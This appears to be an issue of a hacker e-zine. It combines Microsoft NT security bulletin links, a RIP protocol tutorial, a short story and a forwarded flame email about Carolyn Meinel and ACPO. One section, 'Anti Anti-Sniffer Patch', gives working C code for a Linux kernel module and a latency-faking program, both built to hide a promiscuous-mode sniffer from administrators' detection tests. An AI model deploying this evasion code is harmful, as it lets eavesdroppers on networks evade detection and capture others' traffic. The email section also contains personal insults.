http://www.microsoft.com/technet/security/bulletin/ms99-008.asp
February 1999
MS99-007: Patch Available for "Taskpads Scripting" Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms99-007.asp
MS99-006: Fix Available for Windows NT "KnownDLLs List" Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms99-006.asp
MS99-004: Patch Available for Authentication Processing Error in Windows
NT 4.0
Service Pack 4
http://www.microsoft.com/technet/security/bulletin/ms99-004.asp
November 1998
MS98-017: Patch Available for "Named Pipes Over RPC" Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms98-017.asp
September 1998
MS98-014: Patch Available for "RPC Spoofing Denial of
Service" Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms98-014.asp
August 1998
MS98-012: Patch available for Security Vulnerabilities in Microsoft PPTP
http://www.microsoft.com/technet/security/bulletin/ms98-012.asp
July 1998
MS98-009: Patch Available for "Windows NT Privilege
Elevation" Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms98-009.asp
March 1998
MS98-001: Disabling Creation of Local Groups on a Domain by
Non-Administrative
Users
http://www.microsoft.com/technet/security/bulletin/ms98-001.asp
================================================================================
>----------------------------------------<
>---After you install NT HotFixes ? ---<
>----------------------------------------<
Fix Your Security
---> NT Server & Wks
Windows NT 4.0 Member Server Configuration
Checklist
http://www.microsoft.com/technet/security/mbrsrvcl.asp This checklist
outlines the steps you should take to secure Windows NT servers acting as
member servers, either on their own or as part of a Windows NT or Windows
2000 domain.
Windows NT 4.0 Workstation Configuration
Checklist
http://www.microsoft.com/technet/security/wrkstchhk.asp This checklist
outlines the steps you should take to secure computers running Windows
NT Workstation, either on their own or as part of a Windows NT or Windows
2000 domain.
Windows Domain Controller
Checklist
http://www.microsoft.com/technet/security/dccklst.asp This checklist
outlines the steps you should take to secure servers acting as
Windows NT Server 4.0 domain controllers (DCs).
Windows NT C2 Configuration
Checklist
http://www.microsoft.com/technet/security/c2config.asp This checklist
outlines the steps you should take to duplicate the C2-evaluated
configuration of Windows NT Server 4.0. Note that following this
checklist does not make your installation C2-compliant; it merely
assures you that the software configuration matches the configuration that
the NCSC evaluated.
---> Advanced Server
Secure Internet Information Services 5
Checklist
http://www.microsoft.com/technet/security/iis5chk.asp Recommendations
and best practices to secure a server on the Web running Microsoft
Windows 2000 and Internet Information Services (IIS) 5
Windows 2000 Internet Server Security
Tool
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=19889 This tool
makes it easy to secure an Internet server running IIS 5.0. It lets you
configure an IIS 5.0 server without needing to configure individual
registry settings, security policies, and other details
Hotfix Checking Tool for IIS
5.0
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=24168 This tool
enables IIS 5.0 administrators to to ensure that their servers are up
to date on all security patches. The tool can be run continuously or
periodically, against the local machine or a remote one, using either a
database on the Microsoft website or a locally-hosted copy. When the
tool finds a patch that hasn't been installed, it can display or
dialogue or write a warning to the event log.
>-------------------------<
>---Fix Your Registry ---<
>-------------------------<
This step is going to be covered in detail in the next KV12
[Routing Information Protocol (RIP)]====================[pr00f/alkinoos]
+--[ Table of Contents ]------------------------------------------+
| |
[1]- Introduction .............................................. -[1]
[2]- Background ................................................ -[2]
[3]- RIP Operation ............................................. -[3]
[4]- Microsoft Specific RIP Features ........................... -[4]
[5]- RIPv1 Packet Details ...................................... -[5]
[6]- RIPv2 Packet Details ...................................... -[6]
[7]- RIPv2 Authentication ...................................... -[7]
[8]- Thanks .................................................... -[8]
| |
+-----------------------------------------------------------------+
= Introductions =
I decided to write on this subject for the upcoming Keen Veracity 11, a
publication brought out by the Legions of the Underground (LoU). I'm not
usually one to write a text or an article of any kind, as I don't have
much confidence in my writing. However, KV11 was in need of submissions.
I wanted to write about a subject that hasn't already been gone over a
hundred times before. This was my choice.
- pr00f <pr00f@pr00f.org>
The first time I had to deal with RIP, it was a nightmare. I had to
find a way for various pieces of equipment from different manufacturers
to share routing information. I hope that this will help those that
might be interested in how the worlds most popular Interior Gateway
Protocol (IGP) works, and maybe offer insight to those who are trying
to actually work with RIP.
- alkinoos <alkinoos@project802.net>
= Background =
Although this document was written for people without much existing
knowledge of RIP, it does require a basic understanding of networking
and perhaps TCP/IP. Enjoy.
RIP is a distance-vector protocol that uses the hop count as its metric
value and is designed for IP networks. Basically, it can determine
distances between a packets' source and destination by counting the
number of routers the packet should travel through (a metric is a number
representing the distance to a destination, in this case its measured in
routers). RIP is used for routing only within a single autonomous
system (the definition of an IGP) and was originally drafted in 1988
(RFC 1058) and later upgraded in 1994 (RFC 1723).
= RIP Operation =
Networks have a certain topology that is sometimes static, and sometimes
dynamic. RIP provides routing information for dynamically changing
network topologies. It also has safety-net features that prevent
improper route broadcasting, such as having the ability to detect a
split horizon. The metric count that RIP stores can range anywhere from
1 to 16, so that when the hop count reaches 16 it is considered
infinite, and the route is considered unreachable: this helps prevent
an infinite routing loop. This also presents a shortcoming as there may
be networks that have more than 15 hops (although I hope I never have to
deal with one ;). Determining the shortest path by metric can also be
misleading because there are other issues like latency and throughput
that are not covered by RIP.
RIP messages are encapsulated in UDP (User Datagram Protocol) packets
and broadcast to the destination subnet on port 520. RIP manages itself
via timers. The routing-update timer keeps track of how long it should
wait between routing updates and is generally set somewhere between half
a minute and a full minute. A few random number of seconds should be
added or subtracted to/from this timer every time it is reset in order
to prevent collisions with other timers. If a route is not renewed, it
will remain a route until the route-timeout timer expires as an invalid
route, then dropped from a routing table when the the route-flush time
expires.
One of the major differences between the two RIP versions is that RIPv2
has the ability to support subnetting, supernetting, and Variable Length
Subnet Masks (VSLM) or Classless InterDomain Routing (CIDR). This is very
important in todays networks and it is rare to see RIPv1 used. Another
major difference and reason RIPv1 is not used as much is that RIPv2
supports authentication. RIPv2 also adds support for (optional)
multicast RIP announcements, which are sent to the IP multicast address
224.0.0.9. This helps keep non-RIP nodes from being bothered by RIP
announcements. Broadcast announcements are still supported.
= Microsoft Specific RIP Features =
Just as with everything else, Microsoft has dipped it's hand into the
RIP pot and pulled out some honey. They have implemented an enhanced,
albeit optional, variation to the traditional split horizon in Windows
2000. Split horizon with reverse poison. But, unlike split horizon, a
Windows 2000 RIP router that has enabled reverse poison announces all
of it's routes. The big difference here is that the routes that were
learned in a given direction are announced with a hop count of 16,
indication of an unreachable network. Although this has no benefit in a
single-path internetwork, in a multi-path internetwork substantially
reduces the count-to-i
nfinity and routing loop problems that commonly
occur with RIP. The biggest disadvantage of split horizon with reverse
poison is the increased overhead of announcing all routes.
= RIPv1 Packet Details =
RIPv1 messages are encapsulated in UDP (User Datagram Protocol) packets
and broadcast to the subnet on port 520. The RIPv1 packet header
consists of three fields totaling 4 bytes in length. The header format
is diagrammed (from RFC 1058) and defined below:
0 1 2 3 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| command (1) | version (1) | must be zero (2) |
+---------------+---------------+-------------------------------+
* The command byte determines the purpose for the packet. A value of
0x01 is a request for the neighboring routers to send all or part of
their routing tables. A value of 0x02 is a response containing all or
part of the router's routing tables. The response is usually sent in
response to a request or to a poll. Values of 0x03-04 have been
obsoleted and are ignored. Sun Microsystems has implemented 0x05 for
it's own uses (this might warrant further investigation). This field
is 1 byte in length.
* The version byte, obviously, contains the RIP version being
implemented in the packet. Since we're just going over RIPv1 at the
moment, this will always be 0x01. This field is 1 byte in length.
* The last two bytes of the header are unused and should always be
zero. This field is 2 bytes in length.
The rest of the RIPv1 message consists of 1 to 25 routes, each 20 bytes
in size. If there are more than 25 routes to send in an
announcement, an additional announcements will be sent. Each route
consists of six fields that define the routes characteristics. They are
diagrammed (from RFC 1058) and defined below:
0 1 2 3 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-------------------------------+-------------------------------+
| address family identifier (2) | must be zero (2) |
+-------------------------------+-------------------------------+
| IP address (4) |
+---------------------------------------------------------------+
| must be zero (4) |
+---------------------------------------------------------------+
| must be zero (4) |
+---------------------------------------------------------------+
| metric (4) |
+---------------------------------------------------------------+
* The address family identifier is used to indicate to the router what
protocol the route will be use for. Usually this will always be 0x02
indicating the IP family, although there is also RIP for IPX. This
field is 2 bytes in length.
* The next field is not used in RIPv1 and will always consist of
zeros. This is used in RIPv2. This field is 2 bytes in length.
* The IP address is the destination for the route. This can be
one of several values; a subnet network ID, an IP address when
defining a host route, or 0.0.0.0 when defining the default route.
When sending a request message, this will always be 0.0.0.0. This
field is 4 bytes in length.
* The next two field are both unused in RIPv1 and should consist of
only zeros. These are used in RIPv2. Each of these fields are 4 bytes
in length.
* The last field, metric, is the number of hops that must be crossed to
reach the network defined in the IP address field. This is a 4 byte
field.
= RIPv2 Packet Details =
RIPv2, like RIPv1, can be encapsulated in UDP packets and broadcast to
the subnet. However it also has the optional capability to use IP
multicasting, sending announcements to 224.0.0.9. The RIPv2 header is
identical to the RIPv1 header, with the minor exeption of the version
number in the second field. The header format is diagrammed (from RFC
1723) and changes from RIPv1 are defined below:
0 1 2 3 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Command (1) | Version (1) | unused |
+---------------+---------------+-------------------------------+
* The second field, version, should always be 0x02 in RIPv2. For
details on the other fields, refer to the RIPv1 header details in the
section above. This field is 1 byte in length.
For backward compatibility the RIPv2 message format is identical to the
RIPv1 message format. The key here is that RIPv2 takes advantage of the
unused fields that exist in the RIPv1 message. The creators of RIP were
obviously thinking ahead. Again, there can only be up to 25 routes in
an announcement. The header format is diagrammed (from RFC 1723) and
changes from RIPv1 are defined below:
0 1 2 3 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+---------------+---------------+-------------------------------+
| Address Family Identifier (2) | Route Tag (2) |
+-------------------------------+-------------------------------+
| IP Address (4) |
+---------------------------------------------------------------+
| Subnet Mask (4) |
+---------------------------------------------------------------+
| Next Hop (4) |
+---------------------------------------------------------------+
| Metric (4) |
+---------------------------------------------------------------+
* The route tag was unused in RIPv1. This was originally used to
distiguish between RIP routes and routes outside of the RIP
environment. This field is 2 bytes in length.
* The subnet mask is one of the defining points of RIPv2. It's
inclusion allowed RIP to survive in a world or reduced address space.
This field contains the subnet mask for the IP address in the IP
address field. This field is 4 bytes in length.
* The next hop is used to define the gateway for the IP address in the
IP address field. This field will be set to 0x00-00-00-00 if the
route announcement is coming from the gateway. This field is 4 bytes
in length.
= RIPv2 Authentication =
RIPv2's method for passing authentication is rather simple, but it's
quite effective. Normally a route entry would be the first thing, after
the RIP header, occupying the RIP announcement. But when using
authentication, the first route entry is replaced with an
authentication entry. The authentication entry is the same size, but
the last four fields of the route entry are replaced with a single 16
byte field that contains the authentication password as either clear
text, encrypted text, or in the form of a hash (such as MD5). The
modified route entry used for authentication is diagammed (from RFC
1723) and defined below:
0 1 2 3 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+---------------+---------------+-------------------------------+
| 0xFF-FF | Authentication Type (2) |
+-------------------------------+-------------------------------+
~ Authentication (16) ~
+---------------------------------------------------------------+
* The first field is normally seen as the address identifier field that
identifies the route protocol. When using authentication, this field
is replace with 0xFF-FF which indicates the use of authentication.
Routers not using authentication will see this as an invalid route
and will ignore it. This field is 2 bytes in length.
* The authentication type fields defines for the router what method of
password encryption is being used. RCC 1723 only defines simple
(clear text) password authentication, indicated by 0x02. Some routers
do support MD5 and other methods of password encryption. This field
is 2 bytes in length.
* Finally, the authentication field is what contains the password.
Passwords are only limited to 16 characters in order to preserve the
route entry appearance. The passwords are left-justified and padded
with 0x00 (null) characters. This field is 16 bytes in length.
Something to keep in mind is that because the authentication entry takes
the place of the first route entry, you will have one less route passed
with each RIP annoucement. Of the 25 possible entries, only 24 of them
can be route entries.
= Thanks =
I'd like to thank a couple people for making suggestions on what to
include and helping with the overall readability of the article:
evilrabbit, Intelagent
[ANTI ANTI-SNIFFER PATCH]============================================[vecna]
http://www.s0ftpj.org - Italian security/hacking group.
HISTORY:
Summer 2000: Thought of the patch
November 2000: published code and italian file
July 2001: I know that the code published on packetstorm cannot be
understood, this invites me to write this readme file.
This work is coded and tested under Linux kernel 2.2[.15|.16]
FOCUS of this document is:
i) Make possible patch to elude anti sniffer and some programs that use
the series of technique explained by l0pht's studies.
ii) Suggest possible techniques for secure sniffer discovery.
Mac Address Check
This is a old technique, consisting of send packets to valid ip address
but with fake mac destination address, some stacks doesn't check datalink
layer header and give packets at superior layer. Usually is implemented
with ICMP echo request and arp request, but can be used with any kind of
packets of any protocol. Simple you send erroneous packets and if you
received some reply you are sure that source of reply is running
in promiscuous mode.
Fix
Simple: the anti sniffer works because any stack will reply without
checking the destination mac. It's simple to make a kernel patch for
dropping any packets with a destination mac address different from
network card mac address and different to "ff:ff:ff:ff:ff:ff" (used as mac
broadcast). Implemented as kernel module for linux 2.2.
DNS Resolver Check
Some sniffers will try to resolve the sniffed IP to aid the user in
indentification. This feature can be attacked by anti-sniffer check. The
check appears as a SYN flood with random destinations, while reading the
DNS requests made my the sniffing device. If you see DNS requests on the
network while performing this, chances are, you have a sniffing device on
the network.
Fix
DNS resolving is due to gethostbyname() resolve function. You must
remove it from sniffer code (or disable it) and use a IP only format.
In addition, if you want to resolve addresses anyway, you can always watch
the network traffic of the target sniffer (if he is resolving).
Network Latency Test
- admin host start to pinging one network interface and trace the medium
of him icmp echo reply
- admin host start syn flood on the network for non-existent IP.
- admin host check echo reply statistic after starting of flood.
If the network interface has a heavy ping reply time increment it's due
to hard network traffic, due to the flood, because network card is
running in promiscuous mode, this anti sniffer check work over the
physical law "more work -> more time".
Fix
Few time before anti anti sniffer patch, I've coded libvsk. Libvsk is a
library suite for manipulating ongoing traffic working BEFORE the kernel
using this concept:
From userspace I set firewalling rules to DROP certain packets,
From userspace I set datalink socket to read the packets that before raw
socket layer kernel drop for my explicit request with firewall rules.
With this library, you can code lots of nice applications related to
network direction and similar things.
For more info check http://www.s0ftpj.org and search libvsk and example
spf.c, This is coded for kernel 2.2, after I've coded some applications
working under kernel 2.2 2.4, I will port to *BSD with ipfw and solaris
(or other system) with ipf,
using system(3) than manually setsockopt/ioctl for add filtering rules
(it's very hard filling certain structures)...
For eluding network latency test I've coded a simple program that will
drop any ICMP echo request before kernel reply, read some request and
DELAY the reply.
Admin knows that network run on prom. mode when he sees great increments
on echo reply ... such 0.1 to 3.0 ... but if you set manually a delay such
3.0 in normal condition, when flood start cannot be view great increment,
and btw never can be to 30 times (3.0 / 0.1) but lower that 1/0.5 times.
THE CODE:
- lodable module for source ethernet address check
-
- for more info read phrack 55 - 12
-
/*
# gcc -O6 -c aasp_lkmachk.c -I/usr/src/linux/include
# insmod aasp_lkmachk.o device=eth0
# rmmod aasp_lkmachk
Anti Anti Sniffer Patch (by vecna@s0ftpj.org) - MAC checker module
*/
#define MODULE
#define __KERNEL__
#include <linux/config.h>
#include <linux/module.h>
#include <linux/version.h>
#include <linux/netdevice.h>
#include <net/protocol.h>
#include <net/pkt_sched.h>
#include <net/tcp.h>
#include <net/ip.h>
#include <linux/if_ether.h>
#include <linux/ip.h>
#include <linux/skbuff.h>
#include <linux/kernel.h>
#include <linux/mm.h>
#include <linux/file.h>
#include <asm/uaccess.h>
#define r_mac sk->mac.ethernet->h_dest /* received mac */
#define t_mac true->dev_addr /* true mac */
char *device;
MODULE_PARM(device, "s");
struct device *true;
struct packet_type aasp_ip, aasp_arp;
int chk_mac_arp(struct sk_buff *sk, struct device *dev, struct packet_type
*pt)
{
if( r_mac[0] ==r_mac[1] ==r_mac[2] ==r_mac[3] ==r_mac[4]
==r_mac[5] ==0xff)
/* ARP broadcast */
goto end;
if( (r_mac[0] !=t_mac[0]) || (r_mac[1] !=t_mac[1]) ||
(r_mac[2] !=t_mac[2]) || (r_mac[3] !=t_mac[3]) ||
(r_mac[4] !=t_mac[4]) || (r_mac[5] !=t_mac[5]) )
{
/* ARP mac spoof detected */
sk->nh.arph->ar_hrd = 0;
sk->nh.arph->ar_pro = 0;
sk->nh.arph->ar_op = 0;
goto end;
}
end:
kfree_skb(sk);
return(0);
}
int chk_mac_ip(struct sk_buff *sk, struct device *dev, struct packet_type
*pt)
{
/* read #define(s) after #include(s) */
if( (r_mac[0] !=t_mac[0]) || (r_mac[1] !=t_mac[1]) ||
(r_mac[2] !=t_mac[2]) || (r_mac[3] !=t_mac[3]) ||
(r_mac[4] !=t_mac[4]) || (r_mac[5] !=t_mac[5]) )
{
/* IP check - anti spoof detect! */
sk->nh.iph->tot_len = 0;
sk->nh.iph->check = 0;
}
kfree_skb(sk);
return(0);
}
int init_module(void)
{
if (device)
{
true =dev_get(device);
if (true ==NULL)
{
printk("Did not find device %s!\n", device);
return -EINVAL;
}
}
else
{
printk("Usage: insmod aasp_lkmachk.o device=device name
\n\n");
return -ENODEV;
}
printk("Mac checker module run on %s - by
vecna@s0ftpj.org\n",device);
printk("Full codes of Anti Anti Sniffer Patch can be"
" downloadated at www.s0ftpj.org\n");
aasp_ip.dev = true;
aasp_ip.type = htons(ETH_P_IP);
aasp_ip.func = chk_mac_ip;
aasp_arp.dev = true;
aasp_arp.type = htons(ETH_P_ARP);
aasp_arp.func = chk_mac_arp;
dev_add_pack(&aasp_ip);
dev_add_pack(&aasp_arp);
return(0);
}
void cleanup_module(void)
{
dev_remove_pack(&aasp_ip);
dev_remove_pack(&aasp_arp);
printk("Anti Anti Sniffer Patch - MAC checker module unload\n");
}
--
fake network latency test:
/*
Fucker Latency of test for Anti Anti Sniffer Patch
*/
#include "libvsk.h" /* www.s0ftpj.org for more info */
#include <errno.h>
extern int errno;
#define fatal(M) { \
perror(M); \
exit(0); \
}
#define IPSIZE sizeof(struct iphdr)
#define ICMPSIZE sizeof(struct icmphdr)
#define IIPKTSIZE sizeof(struct iipkt)
int check_dup(struct iipkt *);
void build_reply(struct iipkt *, struct sockaddr_in *, struct iipkt *);
unsigned short ip_s(unsigned short *, int);
int main(int argc, char **argv)
{
int dlsfd, offset, forward, hdrincl =1, pkt_info[4], x;
char ipdst[18], *rcvd =malloc(IIPKTSIZE);
struct ifreq ifr;
struct in_addr in;
struct iipkt *reply =malloc(IIPKTSIZE);
printf("\t Anti Anti Sniffer Patch for elude latency test\n");
printf("\t by vecna - vecna@s0ftpj.org - www.s0ftpj.org\n\n");
if(argc != 3)
{
printf( " usage %s interface fakedelay\n\n", argv[0]);
exit(0);
}
printf(" running on background\n");
if(fork())
exit(0);
pkt_info[0] =pkt_info[1] =ICMP_ECHO;
pkt_info[2] =0;
pkt_info[3] =0xFFFF;
x =socket(PF_INET, SOCK_DGRAM, IPPROTO_IP);
strncpy(ifr.ifr_name, argv[1], sizeof(ifr.ifr_name));
if(ioctl (x, SIOCGIFADDR, &ifr) < 0)
fatal("unable to look local address");
memcpy((void *)&in, (void *)&ifr.ifr_addr.sa_data +2, 4);
strcpy(ipdst, (char *)inet_ntoa(in));
close(x);
dlsfd =set_vsk_param(NULL, ipdst, pkt_info, argv[1],
IPPROTO_ICMP, IO_IN, IP_FW_INSERT, 0, 0);
if(dlsfd < 0)
fatal("set_vsk: IP_FW_INSERT");
if((offset =get_offset(dlsfd, argv[1])) <0)
fatal("get device offset");
if((forward = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) == -1)
fatal("forward socket - SOCK_RAW");
if((x = setsockopt(forward, IPPROTO_IP, IP_HDRINCL,
&hdrincl, sizeof(hdrincl))) == -1)
fatal("setsockopt - IP_HDRINCL");
while(1)
{
struct iipkt *packet;
static int last_id;
read(dlsfd, rcvd, IIPKTSIZE);
(char *)packet = rcvd + offset;
if(check_dup(packet))
continue;
if(check_packet(packet, IPPROTO_ICMP))
{
struct sockaddr_in sin;
build_reply(packet, &sin, reply);
usleep(atoi(argv[2]));
x =sendto(forward, (char *)reply,
ntohs(reply->ip.tot_len), 0,
(struct sockaddr *)&sin,
sizeof(struct sockaddr) );
if(x < 0)
fatal("sendto on forwarding packet");
}
memset(packet, 0, IIPKTSIZE);
}
free(rcvd); /* never here */
}
void build_reply(struct iipkt *packet, struct sockaddr_in *sin,
struct iipkt *reply)
{
memcpy((void *)reply, (void *)packet, IIPKTSIZE);
reply->ip.id =getpid() & 0xffff ^ packet->ip.id;
reply->ip.saddr =packet->ip.daddr;
reply->ip.daddr =packet->ip.saddr;
reply->ip.check =ip_s((u_short *)&reply->ip, IPSIZE);
reply->icmp.type =ICMP_ECHOREPLY;
reply->icmp.checksum =0x0000;
reply->icmp.checksum =ip_s((u_short *)&reply->icmp,
ntohs(packet->ip.tot_len) - IPSIZE );
/* setting sockaddr_in stuctures */
sin->sin_port =htons(0);
sin->sin_family = AF_INET;
sin->sin_addr.s_addr = reply->ip.daddr;
}
int check_dup(struct iipkt *packet)
{
static int last_id;
int id =htons(packet->ip.id);
if(id ==htons(last_id))
return 1;
last_id =packet->ip.id;
return 0;
}
u_short ip_s(u_short *ptr, int nbytes)
{
register long sum = 0;
u_short oddbyte;
register u_short answer;
while (nbytes > 1)
{
sum += *ptr++;
nbytes -= 2;
}
if (nbytes == 1)
{
oddbyte = 0;
*((u_char *) &oddbyte) = *(u_char *)ptr;
sum += oddbyte;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
--
Ideas for new anti sniffer (or anti anti anti sniffer :) ?
Make the same work used on network latency test but use for check TCP
packets, for network statistic, also tcp can be used, think to SYN packets
for port 0, any host reply with RST+ACK, you may use time of RST+ACK reply
for trace network statistic and for viewing REAL network congestion
statistic after start the flood.
BTW: this system cannot be accurate for some things how ...
- local and remote load average network undependent ...
- your local network device congestion due to your flood
- network driver, ram, cpu, kind of device
- runnng of program working on datalink/raw layer
- other ?
Using network restriction is a good idea for detect prom. cards,
this can be tested with systems on your network that you admin yourself or
your friends ... or other cases such LAN party is easy put network card
without ip address and with arp filtering (for drop any arp broadcast),
this mean that you may sniff without problem :)
/* Editors Note: Sorry about the translation vecna, I was tired! */
[The Wait (fiction)]=============================================[Digital Ebola]
The Wait
Digital Ebola
Night. Desert. Passed out in the sand, was a man. He started to come to.
Groggy, disoriented, the moon was bright. The man stood up. His legs almost
buckled under his weight. The man held fast. Standing, he started to wonder
where he was. He began to wonder who he was, and why he was there. He was
chilled by the night air. A predatory bird of some form screeched in the
distance.
The man began to walk.
As he started to walk, the man's mind began to start asking the seemingly
unanswerable questions. Here he was in the desert with no clue as to why or
how, he did not even know his own name. First things first, the man thought.
Inventory. He was wearing blue jeans, a white shirt, and boots. His hair was
kept short, and beard stubble was started to develop. He guessed he was about
in his late 20's, early 30's. He continued to walk, checking the contents
of his pockets. In his breast pocket, there was a pack of cigerettes.
Do I smoke, thought the man to himself. He did not know.
He checked his other pockets.
He produced a silver zippo lighter and a crumpled piece of paper. Sticking a
cigerette in his mouth, he started to pray the lighter worked. He did not care
if he smoked or not, he needed the absoulute normality of something making
sense. He flicked the lighter. Click. Nothing. Click. Nothing. Sighing, the man
flicked once more, producing a flame. As he lit the cigerette, he inhaled.
The man did not cough.
As the easing calm of the cigerette rushed thru his veins, his mind began to
become clear. He relized that he was still clutching the crumpled piece of
paper. He unfolded it and read it:
John,
I hope you have a great time on your vacation, I miss you!
With love,
Maria
Now, the man was more confused. Was he John? He kicked at the sand as he began
to climb a sand dune. He finished his cigerette and flicked it into the sand.
The moon shone bright, and from the top of the dune, all he could see was more
sand. He stopped.
"WHO AM I?", he screamed. He was answered by a coyotes howl. There was noone
else. Desperate to get answers, he began to walk even faster. The faster he
walked it seemed, the faster his mind would race. Over and over the questions
kept pounding him. And over and over, the answers eluded him. There was nothing
on this chilly night to help him. He kept pace, and began to sing some tune.
He was not happy, but singing helped get his mind off the questions. Never
before in his memory had he felt so alone, although he could not remember a
single detail of his life, he knew that he had never before been overcome by
the misery he was undergoing.
The sun began to rise.
As the sun began to rise, the man noticed that he was really thirsty. His
mouth was dryer then the desert he transversed, and his tongue was numb. He
was almost out of cigerettes, and his hopes of finding his answers were fading.
He estimated that he had been walking about 7 hours, and the thoughts of
leaving this horrible place were non-existent. As he topped the next dune,
he heard a vehicle. His pulse rose. He raced to the very top of the dune. He
could see a city! There was a truck coming towards him. HEY! The man yelled.
His throat was dry. He yelled again. The truck seemed to accelerate.
The man ran down the dune.
When the man reached the truck, its lone driver stopped, and opened the door.
Before the man could utter a word, the driver produces a hi-power rifle.
The only audience for the gunshots was the driver and the vultures overhead.
The man awoke. He was strapped in a hospital bed. He tried to cry out. He
could make no sound. A nurse came in. The man tried to speak, but the nurse
just ignored him, and walked out the door. A few minutes later, a doctor
came into his room with the nurse.
"Ahh, Mr. Hammerman, I see that you have awakened....", chided the doctor.
And with that, the nurse handed the doctor a syringe, and the doctor injected
the man, forever dooming him to the desert.
Night. Desert. The man awoke....
[Carolyn Does It Again]======================[Why Won't This Bitch Just Go Away]
Date: Tue, 10 Jul 2001 22:55:39 -0500 (CDT)
From: Digital Ebola <digi@legions.org>
To: dc-stuff@dis.org
Subject: Carolyn does it again.
Hi!
I am Digital Ebola. Many of you remember me from such escapades as "Drunk
Man on Couch, Defcon 7" and "They cant declare war!". I have recently
aquired the entire ACPO/Carolyn Meinel aka Granny Bitch Who Derails Trains
with Timex Sinclair story, and I wish to share it. The below items were
not written by me, but by a close friend who wishes to remain
anonymous. Enjoy!
Digital Ebola
www.legions.org
www.legions.org/~digi/
"Network penetration is network engineering, in reverse."
----------------------------------------------------------------------
I have watched as Carolyn has slandered ACPO in
much the same way that she slandered Bronc and Jerico.
The Board of Directors for ACPO won't respond.
They don't want to make a big to-do of it.
The Board of Directors believe that, much like a cold
she will go away. I hate to see good people like Natasha
slandered by this 'woman'. I prepared a response that
they would not release. So I will.
---
In early march, Carolyn Menial posted the address of ACPO,
along with PedoWatch.org, Cyberarmy.org, and Condemned.org on
her site as an example of white hats who were working to
eliminate child pornography and child predators from the network.
Natasha, the Founder of ACPO, became aware of this and was
concerned about the linking of ACPO to 'hacking', if even
in the 'white' sense. Information was sent regarding
Carolyn's webpage to ACPO's contacts in each Organization.
Almost two years ago, ACPO made the strategic decision
to rely on traditional activist techniques, while
supplementing the technical ability of law enforcement agencies.
The rationale being that child pornography, at its core, is
not a technology issue, but a human issue. Technology is
used to facilitate the commission of the crime, by transmitting
the contraband over geographic distances and linking pedophiles
worldwide.
In this transition, ACPO (Formerly ACPM) divested
itself of the 'Hacker' Moniker. This was done due
to the fact that it was a hurdle to interfacing with
law enforcement allies who were also working handle
and eliminate the electronic movement of child pornographic
images.
It is unfortunate that 'Hacker' has come to be synonymous
with criminals, however the crusade to rectify its misuse
would only detract from our mission.
On March 17, 2001 Natasha Grigori sent the following email
to Carolyn Menial:
>Dear Carolyn Menial,
>
>It was brought to my attention that on your site, happyhacker.org,
>there is a story[1] referring to AntiChildporn.org as a group of
>white hat hackers. The Antichildporn Organization is an Non For
>Profit corporation registered in the State of Minnesota. We are
>not hackers, of any color hat or alignment. Our mission is focused
>on educating and facilitating law enforcement agencies in the
>elimination of child pornography on the net. To liken us to hackers,
>in any regard, is tantamount to defamation of character. We request
>that you remove the reference to us, or correct the cited page below
>to omit the reference to white hat hackers.
>
>http://www.happyhacker.org/defend/vigilante.shtml
>
Carolyn promptly responded to Natasha and the Board of Directors.
Her response, though having the tone that one would take when
trying to explain to a child why he should not put kitty into
the washing machine, lead Natasha and the BOD to belive that
they could quickly resolve this matter.
> I'm sorry that you consider white hat hackers to be evil. Perhaps you
are
> not aware of what white hat hackers, and hackers in general are? We
are
> computer professionals with exceptional skills (as promoted on our web
site,
> and widely called "white hat hacking"). We do more than most people
realize
> to combat crime on the Internet, as well as develop free software such
as
> the world's most widely used web server (Apache) and the world's third
most
> widely used operating system (Linux). You also may wish to do a search
on
> the word "hacker" at Amazon.com. You will find books that chronicle the
many
> good works done as a community, nonprofit service by hackers. For
example,
> you will learn that hackers invented email and newsgroups.
>
> How about checking out our web site? You will see that we take a hard
line
> against computer crime happyahcker.org/crime/. Our "Have a great life"
> section (happyhacker.org/greatlife/) reports news from our many
volunteers.
> In fact, the only page on our web site that mentions your organization
is
> devoted to offering computer exerts (HACKERS) opportunities for
community
> service(happyahcker.org/defend/vigilante.shtml). If you check out
> happyahcker.org/news/ and go back a ways, you will find that comptuer
> criminals have wages quite a war trying to drive us off the Internet.
>
> If you decide, after reconsidering this, that you still do not wish the
> services of computer experts with exceptionals skills, please let me
know
> and we will remove you from our opportniies for community service.
>
A member of the Board of Directors, Doug Stead, was the first to
receive this letter and responded to Carolyn. In his letter
he elaborated on the reasoning behind the distancing from
'hacking', even 'white hat hacking' using his usual lack of tact.
> Hi Carolyn,
>
> I am a Director of the ACPO organization. I would like you to
> understand why we take the position we do with regards to white hat
hacking.
>
> We have in the past had good relationship with white hat hackers. We
> however are trying to build ties with Law Enforcement, whom can not
> be associated in any way with criminal activities. Hacking no matter for
> good, is a crime and this bring conflict us into conflict with Law
> Enforcement.
>
> Vigilantism and the criminal justice system are mutually exclusive,
> as one is rightly-so bound by the rule of law, and the other is
not. That
> our goals are the same, I hope, does not, out-weigh the potential damage
> done to the trusted lines of communication we have built. The old saying
> come to be true, "two wrongs don't make a right", and a bad guy doing
good
> is still a bad guy. Hence we (ACPO) can have nothing to do with crime of
> any kind.
>
> I wish you all the best, and hope that you never get caught. Cheers,
>
> Doug Stead
